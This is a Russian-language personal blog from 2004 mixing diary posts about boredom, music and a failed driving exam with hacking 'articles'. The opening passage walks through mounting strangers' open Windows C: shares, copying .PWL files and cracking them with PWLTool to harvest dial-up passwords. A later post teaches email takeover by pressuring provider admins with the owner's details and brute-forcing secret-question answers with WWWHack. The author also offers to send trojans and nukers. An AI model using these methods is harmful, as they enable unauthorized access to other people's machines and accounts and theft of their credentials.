Смотрите на названия папок, открывшихся там. Если там есть папка С, то она нам и нужна. Некоторые юзеры могут переименовать диск С на своё имя или фамилию или ещё как - либо. Так что если диска С вы не увидите, а вместо него увидите допустим папку "Вася", то стоит и её просмотреть (но папок там может и не быть, в этом случае сразу же переходите к следующей жертве ). А если всё вышеуказанное вы увидели, то не спешите радоваться ;) Это пока может ещё не Эврика. Закройте окно Explorer и нажмите в левой колонке ENT - a, на кнопку Shares. Внизу , в окошке Share name: введите следущее //213.45.67.2/c

Это IP адрес и диск С, который вы увидели когда открывали комп жертвы. А в правом, нижнем всплывающем окошке(Local drive), выберите любую из букв. Это будет ваш временный локальный диск. Нажмите на кнопку "Mount", т.е. подключиться. Опять же комп может затормозить на пару минут. И , следующее, что вы увидите, - появится надпись "connection succesfull", что означает подключено чего мы и добивались.

Но, может произойти и хреновое. Может появиться надпись - неправильный пароль. В этом случае попробуйте эту - последнюю процедуру ещё раз . если ета шняга пояилась опять можно наето дело забить ,это будет означать , что он установил пароль на диск и придется искать новых жервт но я думаю их то утя будет много )АЕсли увас все прошло удачнои диск не запоролен то переходим к пункту 3

Этап 3.

Открываете программу FAR manager , и начинаете просматривать и копировать нужное из его диска С. при етом фар может немного подлагивать. СКАЧИВАТЬ НАДО ФАИЛЫ С РАСШИРЕНИЕМ .PVL, не копируйте фаил Rna.PVL он всегда пустой !

Этап 4.

Скопированный pwl, например lamer.pwl, запускате (как обычно вы запускаете любую программу или файл). В открывшейся программе PWLTool нажимате кнопку CheckPass, или, если появится сообщение (имя незарегистрировано в вашей системе), нажмите CheckPassFast и прога начнёт искать пароль на зпароленный lamer.pwl. Далее вы увидете все пароли жертвы. Но бывает и такое, что при нажатии кнопки выйдет сообщение о неправильном пароле на PWL. В этом случае нажмите на кнопку "SearchPasswordFast" и программа начнёт искать пароль pwl-ки.Если программа не найдёт пароль, увеличьте значение в окошке "To:" это кол-во знаков в пароле или измените знаки в окне "Charset string".Ну если совсем крайняк или ты знаеш что у тя в пвлке лежит пароль от Васеного анлима на месяц то тогда надо страться вскрыть всеми способами например : SmartForce, где находится другой переберальщик паролей, етот способ может занять от 4 минут до часа.

Итак, если всё нормально, программа откроет все пароли этого PWL фаила.внем должно лижать чтот вроде етого:

Dial-up:'*RnaСоединениеamlin@prov.ru'
Password:'123'

Ну вот и все, надеюсь теперь ты сможеш защитить себя от таких людей!


Хренова мне...

Воскресенье, 05 Декабря 2004 г. 01:28 + в цитатник
Драсте!!! У меня седня ваще депресище какой то. Делать ваще ничо неохота, весь день спал... Ваще скукота! Эх, пойду в чат, мож там хоть повеселее станет...

ФЛУУУУУУУД!!!

Пятница, 03 Декабря 2004 г. 00:48 + в цитатник
Всем привет!!! Вчера в чате висел, ну как всегда через десять минут мне стало скучно до ужаса и начал флудить... Блин, нравится мне енто занятие... Весело, все орут чето, злятся, а тебе пофигам. Правда флудю я по ламерски, но прикалывает меня енто...

ВЗЛОМ МЫЛА!!!

Четверг, 02 Декабря 2004 г. 00:29 + в цитатник
Драсте всем!!! Это первая статья о хаке. Она посвещена взлому мыла. Прошу оценить.
Первый способ (один из самых простых)
Пишите владельцу мыла какое нить письмо, все равно с каким содержанием, но лишь бы хозяин мыла ответил. Если это какой нить \"чудо-крутой хакер\", то что нить типа: \"Слушай, а ты в натуре можешь сайт сломать??? http://www.microsoft.com/ не твоя работа???\" и так далее в этом духе...;-) Если Веб-мастер, то что нить типа: \"Мне так нравится как ты пишешь! А у тебя JAVA-скрипта нету, что б он там что то делал???\"...По фигу ЧТО, главное что б от него назад ответ пришел. В принципе эта вся процедура была только для того, что б узнать ИМЯ_ФАМИЛИЮ (или ник) и место расположения \"клиента\". То бишь если по ентому мылу находится аська, то смотрим инфу в аське, город (если не прописан в аське, то по ИП), имя, возраст и зип. Потом пишешь админу мыльного сервака (у любой мыльной системы есть админ, и у 99% www-шные сервера), обычно это адреса admin@provider.com и support@provider.com. Так вот... Пишешь письмо (очень желательно через www-браузер, например от www.mail.ru или www.hotmail.com) и через анонимную проксю. Это для того что б в заголовке пакета был ИП прокси. Так.... для секьюрити... ;-) Так вот. В теле письма пишешь, что так и так... Злобные хакеры украли у тебя мыло, а тебе очень нравится их служба, сервис, скорость работы, безглючность и все такое... Что ты никогда не променяешь ихний сервис, и что они вообще самые крутые мыльщики! Указываешь ИМЯ, ФАМИЛИЮ, ЗИП, ГОРОД, Телефон (от балды) или что они там еще просят.... Ессено назад придет письмо, что \"Информация не совпадает с введенной при регистрации и все такое...\". Но ты будь настойчивей! Пиши назад, что ТО_ЧТО_ТЫ_ИМ_ВЫДАЕШЬ - ЕДИНСТВЕННАЯ ВЕРНАЯ ИНФОРМАЦИЯ о ТВОЕМ аккаунте! И повторяешь им ту же инфу, что и первый раз. И так пока админ не сломится...но не забывай каждый раз расхваливать их сервис! ;-) Обычно раз на 7-10 прокатывает... ;-) У меня был даже раз случай, когда один буржуйский админ \"отдал\" мне мыло, где (как потом оказалось) инфа прописанная в мыле ВООБЩЕ не соответствовала той что я ему ВЫДАВАЛ якобы за владельца аккаунта! Так что дерзайте, тут главное БОЛЬШЕ фантазии и упорства! Но и о безопасности не забывайте!

Второй способ (посложнее)

Посложнее, но все равно общедоступный. Почти в каждом мыльном сервисе есть служба что типа \"Foggot Password?\" Так вот...Заходим туды (предварительно не забыв изменить атрибуты филе cookie_для_этой_службы на ReadOnly). Там обычно ОЧЕНЬ простые вопросы... Если повезет , то вопрос будет (к примеру на мыло.ру) \"В каком городе ты родился\"? В первом способе описано как узнавать город юзверя по мылу , так что на этом не бум останавливаться .Ну и вопросы бывают \"кустомайзские\"- типа \"2000\" , ответ обычно такойже..;-) А вот если что нить типа \"Как зовут мою собаку?\" , то читай ниже...

Открываем эту страницу (ну где вводить надо ответ на секретный вопрос , не догоняешь что ль???;-)) итам в HTML-просмотре ищем строчкутипа : form action=\"/cgi-bin/3970.dll?secquest\" итд... Так вот... Если урл мыла http://www.mail.ru , то полный урл места куда отправляется\"секретный ответ\" будет http://www.mail.ru/cgi-bin/3970.dll?secquest. Этот урл вводишь вместе с индефикатором Вопроса в программу типа WWWHack. Идентификатор вопроса находится там же где и form action=\"/cgi-bin/3970.dll?secquest, только чуть дальше . Потом в эту программу или загружаешь встроенный wordlist c паролями или пишешь свой по конкретной тематике, это зависит от вопроса . И вперед! Запускаешь и ждешь...

На этом пока все! ЕСЛИ КТО МОЖЕТ ПОДОГНАТЬ ИНЕТЕРЕСНУЮ СТАТЬЮ В ЭТОМ НАПРАВЛЕНИИ, ПРОШУ ПИСАТЬ МНЕ НА МЫЛО. ГДЕ СВИСНУЛ ЭТУ СТАТЬЮ НЕПОМНЮ, ВРОДЕ НА securityzone.flip.ru

Кстати поздравте меня, я се собаку завел!!! Терь хоть нескучно. Она тока малая еще, докалупывает меня...

Хак и все о нем...

Среда, 01 Декабря 2004 г. 00:15 + в цитатник
Дарова всем!!! Я се седня Аську поставил!:hlop: Стучитесь все кто хочет. И нехочет:)))
Я тут подумал и решил что наэрно буду гдето раза два в неделю выставлять на паказ статьи по хаку или по системе... Так что наэрно завтро или послезавтро появится первая статья. Конечно они все скомунижены с сайтов... Но а что делать:))) Вообщем смотрите.
Через пару деньков займусь в серьез созданием своего сайта. К ентому делу подключино несколько таких же интузиастов. Надеюсь чтонить выгорит.
Ну се, я ушел

Помогите кто может!

Вторник, 30 Ноября 2004 г. 00:15 + в цитатник
Седня пол дня с почтавиком своим маялся. Глючил гад как тока мог. У меня просто The Bat! стоит. Вещь ваще рульная!!! Всем советую. Кстати, если кто хочет, могу прислать мо мылу, он неочень много весит русский 3.5 метра, а англиский 2,5. Могу еще софта подкинуть, сканеры, нюки, трояны и все в этом роде. Так что если чаво, пишите на мыло, вышлю.

З.Ы. Если у вас есь че антиресное такого же типа, присылайте буду бесконечно рад!!! Очень хочу кряк для своей мыльницы. Мож поможите.

Музон

Понедельник, 29 Ноября 2004 г. 00:12 + в цитатник
Седня се скачал новый альбом Киш. Ну так, ничо, слушать можна. Меня в основном Korn, Slipknot и Nirvana рулит. Вот это сила. Ну Киш конечно тоже можно послушать иногда. Раньше от него ваще перся, а ща заглохло. Вот так.

Менты - козлы!!!

Воскресенье, 28 Ноября 2004 г. 00:53 + в цитатник
А я вчера экзамены в ментовке сдавал!!! Один фиг несдал. Можно и неездить было. Когда важдение сдавать начал вот там и начался смех. На легковой на эстакаду заехал, а потом героически скатился назад. Мент говорит чтоб я вылезал, нездал типа, а я неслышу и дальше рулю. Короче догнали, выкинули и обматерили уроды!!! А как дело до камаза дошло, я тока влез, начал искать где там ченить, на меня заорали чтоб я вылазил с него. Мастер крик поднял что он меня в первый раз видит и что я с ним КМАЗом:))) неумею обращаться. А я кстати почти умею, правда я мастера как и его КАМАЗ, первый раз видел но это уже фигня. Я невиноват что на вождения забивал, это обстоятельства такие... Короче несдал я нефига. Мне потом сказали что я могу права эти купить за 4000 деревянных... Ну их всех нахер! Я к стати нерасстраиваюся, зато вчера отметил несдачу!!! Короче вот так вот!!! Весело!:biglol:

Дневник Corik

Пятница, 26 Ноября 2004 г. 01:29 + в цитатник
Дарова нородец!!! А я седня первый раз дневничок се завел. Надеюся что читатели у меня появятся. Хе-хе-хе...


Поиск сообщений в Corik
Страницы: [1] Календарь